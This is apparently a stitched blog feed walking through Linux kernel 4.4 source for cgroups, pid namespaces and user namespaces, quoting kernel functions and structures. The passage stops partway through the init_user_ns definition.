<p>‘kernfs_create_root’ creates a new kernfs hierarchy; this is the root directory of this cgroup. ‘css_populate_dir’ creates the files in the root kernfs directory.</p>
<p>‘rebind_subsystems’ binds this ‘cgroup_root’ to the ‘cgroup_subsys’. The most important code is the following, which sets ‘ss->root’ to dst_root.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for_each_subsys_which(ss, ssid, &ss_mask) {
struct cgroup_root *src_root = ss->root;
struct cgroup *scgrp = &src_root->cgrp;
struct cgroup_subsys_state *css = cgroup_css(scgrp, ss);
struct css_set *cset;
WARN_ON(!css || cgroup_css(dcgrp, ss));
css_clear_dir(css, NULL);
RCU_INIT_POINTER(scgrp->subsys[ssid], NULL);
rcu_assign_pointer(dcgrp->subsys[ssid], css);
ss->root = dst_root;
css->cgroup = dcgrp;
...
}
</code></pre></div></div>
<p>After rebinding the cgroup_subsys’s root, ‘cgroup_setup_root’ has nearly finished its job.</p>
<p>Let’s return to ‘cgroup_init’. It calls ‘cgroup_init_subsys’ to initialize each remaining subsystem, then sets the corresponding bit in ‘cgrp_dfl_root.subsys_mask’.</p>
<p>The following code registers the subsystem’s cftypes, linking them onto the ‘cgroup_subsys’s cfts list head.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (ss->dfl_cftypes == ss->legacy_cftypes) {
WARN_ON(cgroup_add_cftypes(ss, ss->dfl_cftypes));
} else {
WARN_ON(cgroup_add_dfl_cftypes(ss, ss->dfl_cftypes));
WARN_ON(cgroup_add_legacy_cftypes(ss, ss->legacy_cftypes));
}
</code></pre></div></div>
<p>Finally, ‘cgroup_init’ creates the mount point in ‘/sys/fs/cgroup’ by calling ‘sysfs_create_mount_point’, registers ‘cgroup_fs_type’ so that userspace can mount the cgroup filesystem, and creates /proc/cgroups to show cgroup status.</p>
<h3> Cgroups VFS </h3>
<p>At the end of ‘cgroup_init’, a new filesystem ‘cgroup_fs_type’ is registered. This is the cgroup fs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct file_system_type cgroup_fs_type = {
.name = "cgroup",
.mount = cgroup_mount,
.kill_sb = cgroup_kill_sb,
};
</code></pre></div></div>
<p>Every mount creates a new hierarchy, and one or more subsystems can be attached to it.
From the code’s perspective, ‘cgroup_mount’ sets up a cgroup_root for one or more cgroup_subsys.</p>
<p>‘parse_cgroupfs_options’ parses the options from the mount system call into a ‘cgroup_sb_opts’ structure. opts.subsys_mask records which subsystems should be attached to this new hierarchy.</p>
<p>Next, ‘cgroup_mount’ drains the unmounted subsystems.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for_each_subsys(ss, i) {
if (!(opts.subsys_mask & (1 << i)) ||
ss->root == &cgrp_dfl_root)
continue;
if (!percpu_ref_tryget_live(&ss->root->cgrp.self.refcnt)) {
mutex_unlock(&cgroup_mutex);
msleep(10);
ret = restart_syscall();
goto out_free;
}
cgroup_put(&ss->root->cgrp);
}
</code></pre></div></div>
<p>Next, ‘for_each_root(root)’ is used to check whether the subsystems have already been mounted. If ‘root’ is the ‘cgrp_dfl_root’, the subsystem is not mounted, so the loop just continues. A subsystem set that is mounted more than once must match exactly each time.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if ((opts.subsys_mask || opts.none) &&
(opts.subsys_mask != root->subsys_mask)) {
if (!name_match)
continue;
ret = -EBUSY;
goto out_unlock;
}
</code></pre></div></div>
<p>This means, for example, that if we first mount cpu,cpuset on the /sys/fs/cgroup/cpu,cpuset directory, we cannot separately mount the cpu or cpuset subsystem afterwards; we must mount cpu,cpuset together again on another directory. If the check passes, ‘kernfs_pin_sb’ is called to pin the already mounted superblock and we jump to out_unlock, which simply mounts the existing hierarchy on the new directory.</p>
<p>If instead the subsystem hasn’t been mounted, we need to allocate and initialize a new ‘cgroup_root’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root = kzalloc(sizeof(*root), GFP_KERNEL);
if (!root) {
ret = -ENOMEM;
goto out_unlock;
}
init_cgroup_root(root, &opts);
ret = cgroup_setup_root(root, opts.subsys_mask);
if (ret)
cgroup_free_root(root);
out_unlock:
mutex_unlock(&cgroup_mutex);
out_free:
kfree(opts.release_agent);
kfree(opts.name);
if (ret)
return ERR_PTR(ret);
</code></pre></div></div>
<p>And finally mount the new kernfs to the directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> dentry = kernfs_mount(fs_type, flags, root->kf_root,
CGROUP_SUPER_MAGIC, &new_sb);
if (IS_ERR(dentry) || !new_sb)
cgroup_put(&root->cgrp);
</code></pre></div></div>
<h3> Create a new cgroup </h3>
<p>When we create a directory under a hierarchy’s root directory, we create a new cgroup. The kernfs syscall ops are set to ‘cgroup_kf_syscall_ops’ in ‘cgroup_setup_root’, and the mkdir handler is ‘cgroup_mkdir’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct kernfs_syscall_ops cgroup_kf_syscall_ops = {
.remount_fs = cgroup_remount,
.show_options = cgroup_show_options,
.mkdir = cgroup_mkdir,
.rmdir = cgroup_rmdir,
.rename = cgroup_rename,
};
</code></pre></div></div>
<p>‘cgroup_mkdir’ allocates and initializes a new ‘struct cgroup’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> cgrp = kzalloc(sizeof(*cgrp), GFP_KERNEL);
if (!cgrp) {
ret = -ENOMEM;
goto out_unlock;
}
ret = percpu_ref_init(&cgrp->self.refcnt, css_release, 0, GFP_KERNEL);
if (ret)
goto out_free_cgrp;
/*
* Temporarily set the pointer to NULL, so idr_find() won't return
* a half-baked cgroup.
*/
cgrp->id = cgroup_idr_alloc(&root->cgroup_idr, NULL, 2, 0, GFP_KERNEL);
if (cgrp->id < 0) {
ret = -ENOMEM;
goto out_cancel_ref;
}
init_cgroup_housekeeping(cgrp);
cgrp->self.parent = &parent->self;
cgrp->root = root;
</code></pre></div></div>
<p>Then it creates the kernfs directory and populates the cgroup’s files.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kn = kernfs_create_dir(parent->kn, name, mode, cgrp);
if (IS_ERR(kn)) {
ret = PTR_ERR(kn);
goto out_free_id;
}
cgrp->kn = kn;
/*
* This extra ref will be put in cgroup_free_fn() and guarantees
* that @cgrp->kn is always accessible.
*/
kernfs_get(kn);
cgrp->self.serial_nr = css_serial_nr_next++;
/* allocation complete, commit to creation */
list_add_tail_rcu(&cgrp->self.sibling, &cgroup_parent(cgrp)->self.children);
atomic_inc(&root->nr_cgrps);
cgroup_get(parent);
/*
* @cgrp is now fully operational. If something fails after this
* point, it'll be released via the normal destruction path.
*/
cgroup_idr_replace(&root->cgroup_idr, cgrp, cgrp->id);
ret = cgroup_kn_set_ugid(kn);
if (ret)
goto out_destroy;
ret = css_populate_dir(&cgrp->self, NULL);
if (ret)
goto out_destroy;
</code></pre></div></div>
<p>Finally it creates and onlines a ‘cgroup_subsys_state’ for each enabled subsystem.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for_each_subsys(ss, ssid) {
if (parent->child_subsys_mask & (1 << ssid)) {
ret = create_css(cgrp, ss,
parent->subtree_control & (1 << ssid));
if (ret)
goto out_destroy;
}
}
</code></pre></div></div>
<h3> Attach process to a cgroup </h3>
<p>A process can be moved to a new cgroup by writing its pid to the cgroup’s cgroup.procs or tasks file. Let’s use the former as an example.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct cftype cgroup_legacy_base_files[] = {
{
.name = "cgroup.procs",
.seq_start = cgroup_pidlist_start,
.seq_next = cgroup_pidlist_next,
.seq_stop = cgroup_pidlist_stop,
.seq_show = cgroup_pidlist_show,
.private = CGROUP_FILE_PROCS,
.write = cgroup_procs_write,
},
</code></pre></div></div>
<p>The actual handler is ‘__cgroup_procs_write’. It calls ‘cgroup_attach_task’ to attach a task to a cgroup.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int cgroup_attach_task(struct cgroup *dst_cgrp,
struct task_struct *leader, bool threadgroup)
{
LIST_HEAD(preloaded_csets);
struct task_struct *task;
int ret;
/* look up all src csets */
spin_lock_bh(&css_set_lock);
rcu_read_lock();
task = leader;
do {
cgroup_migrate_add_src(task_css_set(task), dst_cgrp,
&preloaded_csets);
if (!threadgroup)
break;
} while_each_thread(leader, task);
rcu_read_unlock();
spin_unlock_bh(&css_set_lock);
/* prepare dst csets and commit */
ret = cgroup_migrate_prepare_dst(dst_cgrp, &preloaded_csets);
if (!ret)
ret = cgroup_migrate(leader, threadgroup, dst_cgrp);
cgroup_migrate_finish(&preloaded_csets);
return ret;
}
</code></pre></div></div>
<p>I won’t go into the details of these function calls. The key path is ‘cgroup_migrate’->’cgroup_taskset_migrate’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> list_for_each_entry(cset, &tset->src_csets, mg_node) {
list_for_each_entry_safe(task, tmp_task, &cset->mg_tasks, cg_list) {
struct css_set *from_cset = task_css_set(task);
struct css_set *to_cset = cset->mg_dst_cset;
get_css_set(to_cset);
css_set_move_task(task, from_cset, to_cset, true);
put_css_set_locked(from_cset);
}
}
</code></pre></div></div>
<h3> How cgroup takes effect on processes </h3>
<p>From the above we know the cgroup internal implementation. Let’s see how it controls processes.</p>
<p>The control is done by the subsystems themselves. For example, when the kernel allocates memory for a process, it calls ‘mem_cgroup_try_charge’ to let the memory cgroup get involved and make sure the process never exceeds its limits.</p>
pid namespace internals2019-12-20T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/12/20/pid-namespace
<p>Namespaces are another method to abstract resources. A namespace makes it appear to the processes within it that they
have their own isolated instance of the global resources. Compared to a virtual machine, a namespace is more lightweight. In this post I will dig into the pid namespace from the kernel side. I use kernel 4.4 in this post.</p>
<h3> Basic structure </h3>
<p>There are six different types of namespaces: uts, ipc, mount, pid, net and user. The pid namespace, like most of the others, is collected in the ‘nsproxy’ structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct nsproxy {
atomic_t count;
struct uts_namespace *uts_ns;
struct ipc_namespace *ipc_ns;
struct mnt_namespace *mnt_ns;
struct pid_namespace *pid_ns_for_children;
struct net *net_ns;
};
</code></pre></div></div>
<p>‘task_struct’ has a ‘nsproxy’ member pointing to a ‘struct nsproxy’ that represents the process’s resource view. ‘struct pid_namespace’ represents a pid namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pid_namespace {
struct kref kref;
struct pidmap pidmap[PIDMAP_ENTRIES];
struct rcu_head rcu;
int last_pid;
unsigned int nr_hashed;
struct task_struct *child_reaper;
struct kmem_cache *pid_cachep;
unsigned int level;
struct pid_namespace *parent;
#ifdef CONFIG_PROC_FS
struct vfsmount *proc_mnt;
struct dentry *proc_self;
struct dentry *proc_thread_self;
#endif
#ifdef CONFIG_BSD_PROCESS_ACCT
struct fs_pin *bacct;
#endif
struct user_namespace *user_ns;
struct work_struct proc_work;
kgid_t pid_gid;
int hide_pid;
int reboot; /* group exit code if this pidns was rebooted */
struct ns_common ns;
};
</code></pre></div></div>
<p>The ‘pidmap’ member is an array of struct ‘pidmap’, a bitmap used to manage pid values. Its definition is quite simple.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pidmap {
atomic_t nr_free;
void *page;
};
</code></pre></div></div>
<p>‘last_pid’ records the last allocated pid value. ‘child_reaper’ is the init process of the pid namespace. ‘user_ns’ points to the user namespace owning this pid namespace.</p>
<p>pid namespace is created by function ‘create_pid_namespace’ in the call chain of clone->copy_namespaces->copy_pid_ns->create_pid_namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pid_namespace *create_pid_namespace(struct user_namespace *user_ns,
struct pid_namespace *parent_pid_ns)
{
struct pid_namespace *ns;
unsigned int level = parent_pid_ns->level + 1;
int i;
int err;
if (level > MAX_PID_NS_LEVEL) {
err = -EINVAL;
goto out;
}
err = -ENOMEM;
ns = kmem_cache_zalloc(pid_ns_cachep, GFP_KERNEL);
if (ns == NULL)
goto out;
ns->pidmap[0].page = kzalloc(PAGE_SIZE, GFP_KERNEL);
if (!ns->pidmap[0].page)
goto out_free;
ns->pid_cachep = create_pid_cachep(level + 1);
if (ns->pid_cachep == NULL)
goto out_free_map;
err = ns_alloc_inum(&ns->ns);
if (err)
goto out_free_map;
ns->ns.ops = &pidns_operations;
kref_init(&ns->kref);
ns->level = level;
ns->parent = get_pid_ns(parent_pid_ns);
ns->user_ns = get_user_ns(user_ns);
ns->nr_hashed = PIDNS_HASH_ADDING;
INIT_WORK(&ns->proc_work, proc_cleanup_work);
set_bit(0, ns->pidmap[0].page);
atomic_set(&ns->pidmap[0].nr_free, BITS_PER_PAGE - 1);
for (i = 1; i < PIDMAP_ENTRIES; i++)
atomic_set(&ns->pidmap[i].nr_free, BITS_PER_PAGE);
return ns;
}
</code></pre></div></div>
<p>This function is quite straightforward: ‘ns->pidmap[0].page’ is the bitmap used to allocate and free pid values.</p>
<p>‘create_pid_cachep’ creates the kmem cache for ‘struct pid’ objects. ‘struct pid’ and ‘struct upid’ are defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pid
{
atomic_t count;
unsigned int level;
/* lists of tasks that use this pid */
struct hlist_head tasks[PIDTYPE_MAX];
struct rcu_head rcu;
struct upid numbers[1];
};
struct upid {
/* Try to keep pid_chain in the same cacheline as nr for find_vpid */
int nr;
struct pid_namespace *ns;
struct hlist_node pid_chain;
};
</code></pre></div></div>
<p>Every process has a ‘struct pid’. A process may also reference another process’s ‘pid’; the ‘tasks’ lists in ‘struct pid’ are used for this. ‘struct upid’ stores the pid value in its ‘nr’ member, and the ‘pid_chain’ member links the ‘struct upid’ into the ‘pid_hash’ hash table.</p>
<p>A process at namespace level ‘level’ has ‘level+1’ pid values: one in its own pid namespace and one in each of its ancestor pid namespaces. So ‘create_pid_cachep’ creates a cache whose objects hold one ‘struct pid’ plus ‘level’ extra ‘struct upid’ entries.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct kmem_cache *create_pid_cachep(int nr_ids)
{
struct pid_cache *pcache;
struct kmem_cache *cachep;
mutex_lock(&pid_caches_mutex);
list_for_each_entry(pcache, &pid_caches_lh, list)
if (pcache->nr_ids == nr_ids)
goto out;
pcache = kmalloc(sizeof(struct pid_cache), GFP_KERNEL);
if (pcache == NULL)
goto err_alloc;
snprintf(pcache->name, sizeof(pcache->name), "pid_%d", nr_ids);
cachep = kmem_cache_create(pcache->name,
sizeof(struct pid) + (nr_ids - 1) * sizeof(struct upid),
0, SLAB_HWCACHE_ALIGN, NULL);
if (cachep == NULL)
goto err_cachep;
pcache->nr_ids = nr_ids;
pcache->cachep = cachep;
list_add(&pcache->list, &pid_caches_lh);
out:
mutex_unlock(&pid_caches_mutex);
return pcache->cachep;
}
</code></pre></div></div>
<h3> pid management </h3>
<p>‘struct pid’ is created by ‘alloc_pid’ called by ‘copy_process’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pid *alloc_pid(struct pid_namespace *ns)
{
struct pid *pid;
enum pid_type type;
int i, nr;
struct pid_namespace *tmp;
struct upid *upid;
int retval = -ENOMEM;
pid = kmem_cache_alloc(ns->pid_cachep, GFP_KERNEL);
tmp = ns;
pid->level = ns->level;
for (i = ns->level; i >= 0; i--) {
nr = alloc_pidmap(tmp);
if (IS_ERR_VALUE(nr)) {
retval = nr;
goto out_free;
}
pid->numbers[i].nr = nr;
pid->numbers[i].ns = tmp;
tmp = tmp->parent;
}
if (unlikely(is_child_reaper(pid))) {
if (pid_ns_prepare_proc(ns)) {
disable_pid_allocation(ns);
goto out_free;
}
}
get_pid_ns(ns);
atomic_set(&pid->count, 1);
for (type = 0; type < PIDTYPE_MAX; ++type)
INIT_HLIST_HEAD(&pid->tasks[type]);
upid = pid->numbers + ns->level;
spin_lock_irq(&pidmap_lock);
if (!(ns->nr_hashed & PIDNS_HASH_ADDING))
goto out_unlock;
for ( ; upid >= pid->numbers; --upid) {
hlist_add_head_rcu(&upid->pid_chain,
&pid_hash[pid_hashfn(upid->nr, upid->ns)]);
upid->ns->nr_hashed++;
}
spin_unlock_irq(&pidmap_lock);
return pid;
}
</code></pre></div></div>
<p>Every process has ‘level+1’ pid values, one for every namespace that can see this process. In the first for loop, ‘alloc_pidmap’ returns the pid value for this process in pid_namespace ‘tmp’. In the last for loop, we use ‘upid->nr’ and ‘upid->ns’ as the key and insert the ‘struct upid’ into the corresponding ‘pid_hash’ table bucket. In this function, we also initialize the ‘pid->tasks’ list heads, which link the processes that use this ‘struct pid’. ‘struct pid_link’ is used to link a ‘task_struct’ to a ‘pid’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pid_link
{
struct hlist_node node;
struct pid *pid;
};
</code></pre></div></div>
<p>Here ‘node’ is the list entry linked into ‘pid->tasks’, and ‘pid’ points to the ‘struct pid’. In ‘copy_process’, we can see the following code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (likely(p->pid)) {
ptrace_init_task(p, (clone_flags & CLONE_PTRACE) || trace);
init_task_pid(p, PIDTYPE_PID, pid);
if (thread_group_leader(p)) {
init_task_pid(p, PIDTYPE_PGID, task_pgrp(current));
init_task_pid(p, PIDTYPE_SID, task_session(current));
if (is_child_reaper(pid)) {
ns_of_pid(pid)->child_reaper = p;
p->signal->flags |= SIGNAL_UNKILLABLE;
}
p->signal->leader_pid = pid;
p->signal->tty = tty_kref_get(current->signal->tty);
list_add_tail(&p->sibling, &p->real_parent->children);
list_add_tail_rcu(&p->tasks, &init_task.tasks);
attach_pid(p, PIDTYPE_PGID);
attach_pid(p, PIDTYPE_SID);
__this_cpu_inc(process_counts);
} else {
current->signal->nr_threads++;
atomic_inc(&current->signal->live);
atomic_inc(&current->signal->sigcnt);
list_add_tail_rcu(&p->thread_group,
&p->group_leader->thread_group);
list_add_tail_rcu(&p->thread_node,
&p->signal->thread_head);
}
attach_pid(p, PIDTYPE_PID);
nr_threads++;
}
static inline void
init_task_pid(struct task_struct *task, enum pid_type type, struct pid *pid)
{
task->pids[type].pid = pid;
}
static inline struct pid *task_pgrp(struct task_struct *task)
{
return task->group_leader->pids[PIDTYPE_PGID].pid;
}
void attach_pid(struct task_struct *task, enum pid_type type)
{
struct pid_link *link = &task->pids[type];
hlist_add_head_rcu(&link->node, &link->pid->tasks[type]);
}
</code></pre></div></div>
<p>If the created task is a thread group leader, we use the ‘current’ task’s group leader to initialize ‘task->pids[PIDTYPE_PGID]’ and attach the new task to the group leader’s ‘pid->tasks’.</p>
<p>The following picture shows the data structure relations.</p>
<p><img src="/assets/img/pidns/1.png" alt="" /></p>
user namespace internals2019-12-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/12/17/user-namespace
<p>Namespaces are another method to abstract resources. A namespace makes it appear to the processes within it that they
have their own isolated instance of the global resources. Compared to a virtual machine, a namespace is more lightweight. In this post I will dig into the user namespace from the kernel side. I use kernel 4.4 in this post.</p>
<h3> Basic structure </h3>
<p>There are six different types of namespaces: uts, ipc, mount, pid, net and user. The first five are collected together in the ‘nsproxy’ structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct nsproxy {
atomic_t count;
struct uts_namespace *uts_ns;
struct ipc_namespace *ipc_ns;
struct mnt_namespace *mnt_ns;
struct pid_namespace *pid_ns_for_children;
struct net *net_ns;
};
</code></pre></div></div>
<p>‘task_struct’ has a ‘nsproxy’ member pointing to a ‘struct nsproxy’ that represents the process’s resource view. However, ‘struct nsproxy’ has no user namespace member. The user namespace is special because it is tied to the process’s credentials: ‘struct task_struct’s cred holds the process’s credential information, and ‘struct cred’ has a ‘user_ns’ member pointing to the process’s user namespace. A user namespace is represented by ‘struct user_namespace’, which has the following definition:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct user_namespace {
struct uid_gid_map uid_map;
struct uid_gid_map gid_map;
struct uid_gid_map projid_map;
atomic_t count;
struct user_namespace *parent;
int level;
kuid_t owner;
kgid_t group;
struct ns_common ns;
unsigned long flags;
/* Register of per-UID persistent keyrings for this namespace */
#ifdef CONFIG_PERSISTENT_KEYRINGS
struct key *persistent_keyring_register;
struct rw_semaphore persistent_keyring_register_sem;
#endif
};
</code></pre></div></div>
<p>‘struct uid_gid_map’ defines the uid/gid mapping between this user namespace and its parent namespace. ‘parent’ points to the parent user namespace. Just as with the other namespaces, user namespaces form a hierarchy, and ‘level’ is the depth in that hierarchy. ‘owner’/’group’ are the effective uid/gid of the creating process. ‘ns’ is the common namespace structure.</p>
<p>‘struct uid_gid_map’ is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct uid_gid_map { /* 64 bytes -- 1 cache line */
u32 nr_extents;
struct uid_gid_extent {
u32 first;
u32 lower_first;
u32 count;
} extent[UID_GID_MAP_MAX_EXTENTS];
};
</code></pre></div></div>
<p>As we know, when we write to /proc/PID/uid_map, we define the uid mapping between the process’s user namespace and its parent user namespace. uid_map/gid_map have the following format:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ID-inside-ns ID-outside-ns length
</code></pre></div></div>
<p>Here ‘ID-inside-ns’ is the ‘uid_gid_extent’s ‘first’ member, ‘ID-outside-ns’ is its ‘lower_first’ member and ‘length’ is its ‘count’ member. uid_map/gid_map can have at most UID_GID_MAP_MAX_EXTENTS (5) lines. The ‘lower’ in ‘lower_first’ refers to the parent user namespace.</p>
<p>Following pic shows the data structure relation.</p>
<p><img src="/assets/img/userns/1.png" alt="" /></p>
<h3> System call behavior of user namespace </h3>
<h4> clone </h4>
<p>The most common way to create new namespaces is the clone system call. Most of the work is done in the ‘copy_process’ function. ‘copy_creds’ copies the parent’s cred and creates the user namespace; the other namespaces are created in the ‘copy_namespaces’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
struct cred *new;
int ret;
...
new = prepare_creds();
if (!new)
return -ENOMEM;
if (clone_flags & CLONE_NEWUSER) {
ret = create_user_ns(new);
if (ret < 0)
goto error_put;
}
...
atomic_inc(&new->user->processes);
p->cred = p->real_cred = get_cred(new);
alter_cred_subscribers(new, 2);
validate_creds(new);
return 0;
}
</code></pre></div></div>
<p>If userspace specifies ‘CLONE_NEWUSER’, ‘copy_creds’ will call ‘create_user_ns’ to create a new user namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int create_user_ns(struct cred *new)
{
struct user_namespace *ns, *parent_ns = new->user_ns;
kuid_t owner = new->euid;
kgid_t group = new->egid;
int ret;
if (parent_ns->level > 32)
return -EUSERS;
/*
* Verify that we can not violate the policy of which files
* may be accessed that is specified by the root directory,
* by verifing that the root directory is at the root of the
* mount namespace which allows all files to be accessed.
*/
if (current_chrooted())
return -EPERM;
/* The creator needs a mapping in the parent user namespace
* or else we won't be able to reasonably tell userspace who
* created a user_namespace.
*/
if (!kuid_has_mapping(parent_ns, owner) ||
!kgid_has_mapping(parent_ns, group))
return -EPERM;
ns = kmem_cache_zalloc(user_ns_cachep, GFP_KERNEL);
if (!ns)
return -ENOMEM;
ret = ns_alloc_inum(&ns->ns);
if (ret) {
kmem_cache_free(user_ns_cachep, ns);
return ret;
}
ns->ns.ops = &userns_operations;
atomic_set(&ns->count, 1);
/* Leave the new->user_ns reference with the new user namespace. */
ns->parent = parent_ns;
ns->level = parent_ns->level + 1;
ns->owner = owner;
ns->group = group;
/* Inherit USERNS_SETGROUPS_ALLOWED from our parent */
mutex_lock(&userns_state_mutex);
ns->flags = parent_ns->flags;
mutex_unlock(&userns_state_mutex);
set_cred_user_ns(new, ns);
#ifdef CONFIG_PERSISTENT_KEYRINGS
init_rwsem(&ns->persistent_keyring_register_sem);
#endif
return 0;
}
</code></pre></div></div>
<p>First we need to do some checks. The namespace nesting level is capped at 32. A chrooted process can’t create a user namespace. The creator also needs a mapping in the parent user namespace so that we can track the namespace’s parental relation. ‘kuid_has_mapping’ has the following definition:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline bool kuid_has_mapping(struct user_namespace *ns, kuid_t uid)
{
return from_kuid(ns, uid) != (uid_t) -1;
}
uid_t from_kuid(struct user_namespace *targ, kuid_t kuid)
{
/* Map the uid from a global kernel uid */
return map_id_up(&targ->uid_map, __kuid_val(kuid));
}
static u32 map_id_up(struct uid_gid_map *map, u32 id)
{
unsigned idx, extents;
u32 first, last;
/* Find the matching extent */
extents = map->nr_extents;
smp_rmb();
for (idx = 0; idx < extents; idx++) {
first = map->extent[idx].lower_first;
last = first + map->extent[idx].count - 1;
if (id >= first && id <= last)
break;
}
/* Map the id or note failure */
if (idx < extents)
id = (id - first) + map->extent[idx].first;
else
id = (u32) -1;
return id;
}
</code></pre></div></div>
<p>The creator (the parent process’s euid) must have a mapping in the parent namespace; otherwise the child namespace would carry no information about who created it.</p>
<p>After all these checks, ‘create_user_ns’ allocates a ‘user_namespace’ struct and does some initialization: it sets the new namespace’s parent to the creator’s user_namespace and increments the level. Finally, ‘set_cred_user_ns’ sets the ‘cred’s ‘user_ns’ member to the newly created ‘user_namespace’.</p>
<h4> unshare </h4>
<p>The unshare system call is simple, as it just creates a new user_namespace for the calling process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int unshare_userns(unsigned long unshare_flags, struct cred **new_cred)
{
struct cred *cred;
int err = -ENOMEM;
if (!(unshare_flags & CLONE_NEWUSER))
return 0;
cred = prepare_creds();
if (cred) {
err = create_user_ns(cred);
if (err)
put_cred(cred);
else
*new_cred = cred;
}
return err;
}
</code></pre></div></div>
<h4> setns </h4>
<p>Another way to change a process to a new user namespace is the setns system call. This system call needs an fd referring to a namespace file under /proc/PID/ns/.
The ‘create_new_namespaces’ function does nothing for the user namespace; the call to ‘ns->ops->install’ does the work. First the ‘ns_common’ struct is obtained from the ‘struct file’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE2(setns, int, fd, int, nstype)
{
struct task_struct *tsk = current;
struct nsproxy *new_nsproxy;
struct file *file;
struct ns_common *ns;
int err;
file = proc_ns_fget(fd);
ns = get_proc_ns(file_inode(file));
if (nstype && (ns->ops->type != nstype))
goto out;
new_nsproxy = create_new_namespaces(0, tsk, current_user_ns(), tsk->fs);
err = ns->ops->install(new_nsproxy, ns);
switch_task_namespaces(tsk, new_nsproxy);
out:
fput(file);
return err;
}
</code></pre></div></div>
<p>For user namespace, the ‘ns->ops->install’ callback is ‘userns_install’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int userns_install(struct nsproxy *nsproxy, struct ns_common *ns)
{
struct user_namespace *user_ns = to_user_ns(ns);
struct cred *cred;
/* Don't allow gaining capabilities by reentering
* the same user namespace.
*/
if (user_ns == current_user_ns())
return -EINVAL;
/* Tasks that share a thread group must share a user namespace */
if (!thread_group_empty(current))
return -EINVAL;
if (current->fs->users != 1)
return -EINVAL;
if (!ns_capable(user_ns, CAP_SYS_ADMIN))
return -EPERM;
cred = prepare_creds();
if (!cred)
return -ENOMEM;
put_user_ns(cred->user_ns);
set_cred_user_ns(cred, get_user_ns(user_ns));
return commit_creds(cred);
}
</code></pre></div></div>
<p>It first gets the ‘user_namespace’ from the ‘ns_common’ struct. After some checks, it calls ‘set_cred_user_ns’ to set the process’s cred’s ‘user_ns’ member to the namespace the fd refers to.</p>
<h4> getuid </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE0(getuid)
{
/* Only we change this so SMP safe */
return from_kuid_munged(current_user_ns(), current_uid());
}
uid_t from_kuid_munged(struct user_namespace *targ, kuid_t kuid)
{
uid_t uid;
uid = from_kuid(targ, kuid);
if (uid == (uid_t) -1)
uid = overflowuid;
return uid;
}
</code></pre></div></div>
<p>‘current_uid’ returns the current task’s kuid. ‘from_kuid’ returns the mapping of ‘kuid’ in user namespace ‘targ’. If there is no mapping, ‘overflowuid’ (DEFAULT_OVERFLOWUID, i.e. 65534) is returned. This is why we get the following result if we just create a user namespace and don’t set the /proc/PID/uid_map mapping file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~/nstest$ unshare -U
nobody@ubuntu:~/nstest$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
</code></pre></div></div>
<h3> User namespace hierarchy </h3>
<p>From the last part, we know every user namespace has a parent except ‘init_user_ns’, which is hard-coded in the kernel as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct user_namespace init_user_ns = {
.uid_map = {
.nr_extents = 1,
.extent[0] = {
.first = 0,
.lower_first = 0,
.count = 4294967295U,
},
},
.gid_map = {
.nr_extents = 1,
.extent[0] = {
.first = 0,
.lower_first = 0,
.count = 4294967295U,
},
},
.projid_map = {
.nr_extents = 1,
.extent[0] = {
.first = 0,
.lower_first = 0,
.count = 4294967295U,
},
},
.count = ATOMIC_INIT(3),
.owner = GLOBAL_ROOT_UID,
.group = GLOBAL_ROOT_GID,
